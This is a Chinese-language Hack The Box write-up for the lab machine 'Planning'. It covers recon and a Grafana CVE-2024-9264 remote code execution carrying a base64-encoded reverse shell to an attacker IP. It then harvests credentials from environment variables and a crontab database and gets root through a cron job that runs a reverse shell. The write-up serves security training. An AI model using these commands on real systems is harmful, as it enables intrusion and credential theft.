# Hack The Box - Planning Writeup Writeup for the box Planning in Hack The Box. ## Box Info | Name | OS | Difficulty | |:-------- | ----- |:---------- | | Planning | Linux | Easy | ### About ## Recon ### Nmap ```bash ┌──(parallels㉿kali)-[~/Documents/Hack The Box/Planning] └─$ sudo nmap 10.10.11.68 -oA nmap/initial Starting Nmap 7.95 ( https://nmap.org ) at 2025-07-11 11:52 CST Nmap scan report for 10.10.11.68 Host is up (0.41s latency). Not shown: 998 closed tcp ports (reset) PORT STATE SERVICE 22/tcp open ssh 80/tcp open http Nmap done: 1 IP address (1 host up) scanned in 3.10 seconds ``` ### Web Service - Port 80 一打開網頁就會被導向 `planning.htb`,將域名加入 hosts 中就能看到網頁: ```bash ┌──(parallels㉿kali)-[~/Documents/Hack The Box/Planning] └─$ echo "\n10.10.11.68 planning.htb" | sudo tee -a /etc/hosts 10.10.11.68 planning.htb ``` 爆破子網域: ```bash ┌──(parallels㉿kali)-[~/Documents/Hack The Box/Planning] └─$ ffuf -w /usr/share/seclists/Discovery/DNS/namelist.txt:FUZZ -u "http://planning.htb/" -H "Host: FUZZ.planning.htb" -ac -t 100 | tee hosts /'___\ /'___\ /'___\ /\ \__/ /\ \__/ __ __ /\ \__/ \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\ \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/ \ \_\ \ \_\ \ \____/ \ \_\ \/_/ \/_/ \/___/ \/_/ v2.1.0-dev ________________________________________________ :: Method : GET :: URL : http://planning.htb/ :: Wordlist : FUZZ: /usr/share/seclists/Discovery/DNS/namelist.txt :: Header : Host: FUZZ.planning.htb :: Follow redirects : false :: Calibration : true :: Timeout : 10 :: Threads : 100 :: Matcher : Response status: 200-299,301,302,307,401,403,405,500 ________________________________________________ grafana [Status: 302, Size: 29, Words: 2, Lines: 3, Duration: 225ms] :: Progress: [151265/151265] :: Job [1/1] :: 434 req/sec :: Duration: [0:06:17] :: Errors: 0 :: ``` 找到了 `grafana.planning.htb` 域名,把它加到 hosts 中。網站上是 Grafana v11.0.0: ![image](https://hackmd.io/_uploads/HJuA1SCSxg.png) ## Shell as root in container 從 Grafana 官方的網站上可以看到 v11.0.0 有一個 RCE 漏洞: {%preview https://grafana.com/security/security-advisories/cve-2024-9264/ %} 下載 PoC: {%preview https://github.com/nollium/CVE-2024-9264?tab=readme-ov-file %} 用 Base64 編碼防止其他符號影響到 payload 執行: ```bash ┌──(venv)─(parallels㉿kali)-[~/Documents/Hack The Box/Planning/CVE-2024-9264] └─$ python3 CVE-2024-9264.py -u admin -p 0D5oT70Fq13EvB5r -c "echo L2Jpbi9iYXNoIC1pID4mIC9kZXYvdGNwLzEwLjEwLjE2LjIvOTAwMSAwPiYx | base64 -d | bash" http://grafana.planning.htb ``` ```bash ┌──(parallels㉿kali)-[~/Documents/Hack The Box/Planning] └─$ nc -lvnp 9001 listening on [any] 9001 ... connect to [10.10.16.2] from (UNKNOWN) [10.10.11.68] 58462 bash: cannot set terminal process group (1): Inappropriate ioctl for device bash: no job control in this shell root@7ce659d667d7:~# ``` ## Shell as enzo 在根目錄可以看到 `.dockerenv`,所以代表我們在 docker 容器中: ```bash root@7ce659d667d7:~# ls -al / ls -al / total 64 drwxr-xr-x 1 root root 4096 Apr 4 10:23 . drwxr-xr-x 1 root root 4096 Apr 4 10:23 .. -rwxr-xr-x 1 root root 0 Apr 4 10:23 .dockerenv ``` 從當前環境變數可以看到一組帳密,用這組帳密可以 ssh 連線到 server: ```bash root@7ce659d667d7:~# env <SNIP> GF_SECURITY_ADMIN_PASSWORD=RioTecRANDEntANT! GF_SECURITY_ADMIN_USER=enzo ``` ```bash ┌──(venv)─(parallels㉿kali)-[~/Documents/Hack The Box/Planning/CVE-2024-9264] └─$ ssh enzo@10.10.11.68 <SNIP> enzo@planning:~$ ``` ### user.txt ```bash enzo@planning:~$ cat user.txt 2154140d************************ ``` ## Shell as root 檢查系統上正在監聽的 port,可以看到 port 8000 上有一個服務正在運行: ```bash enzo@planning:~$ ss -tuln Netid State Recv-Q Send-Q Local Address:Port Peer Address:Port Process <SNIP> tcp LISTEN 0 511 127.0.0.1:8000 0.0.0.0:* ``` 用 ssh 轉發 port 到本機: ```bash ┌──(parallels㉿kali)-[~/Documents/tools/Privilege Escalation] └─$ ssh -L 1234:localhost:8000 enzo@10.10.11.68 ``` 打開網站會發現需要一組帳密,透過 linpeas 找其他線索可以看到一個可疑的檔案: ```bash # linpeas.sh ╔══════════╣ Searching tables inside readable .db/.sql/.sqlite files (limit 100) Found /opt/crontabs/crontab.db: New Line Delimited JSON text data ``` 查看內容可以看到 Password `P4ssw0rdS0pRi0T3c`: ```bash enzo@planning:~$ cat /opt/crontabs/crontab.db {"name":"Grafana backup","command":"/usr/bin/docker save root_grafana -o /var/backups/grafana.tar && /usr/bin/gzip /var/backups/grafana.tar && zip -P P4ssw0rdS0pRi0T3c /var/backups/grafana.tar.gz.zip /var/backups/grafana.tar.gz && rm /var/backups/grafana.tar.gz","schedule":"@daily","stopped":false,"timestamp":"Fri Feb 28 2025 20:36:23 GMT+0000 (Coordinated Universal Time)","logging":"false","mailing":{},"created":1740774983276,"saved":false,"_id":"GTI22PpoJNtRKg0W"} {"name":"Cleanup","command":"/root/scripts/cleanup.sh","schedule":"* * * * *","stopped":false,"timestamp":"Sat Mar 01 2025 17:15:09 GMT+0000 (Coordinated Universal Time)","logging":"false","mailing":{},"created":1740849309992,"saved":false,"_id":"gNIRXh1WIc9K7BYX"} ``` 接著用 `root` 和 `P4ssw0rdS0pRi0T3c` 就能登入系統了: ![image](https://hackmd.io/_uploads/HyIagd1Lgx.png) 最後建立一個新的 job 執行 Reverse shell 指令來以 root 身份進入 server。 ![image](https://hackmd.io/_uploads/BJObGd1Lxx.png) ```bash ┌──(parallels㉿kali)-[~/Documents/Hack The Box/Planning] └─$ nc -lvnp 9001 listening on [any] 9001 ... connect to [10.10.16.2] from (UNKNOWN) [10.10.11.68] 42154 bash: cannot set terminal process group (1469): Inappropriate ioctl for device bash: no job control in this shell root@planning:/# ``` ### root.txt ```shell root@planning:~# cat root.txt 71b20b41************************ ```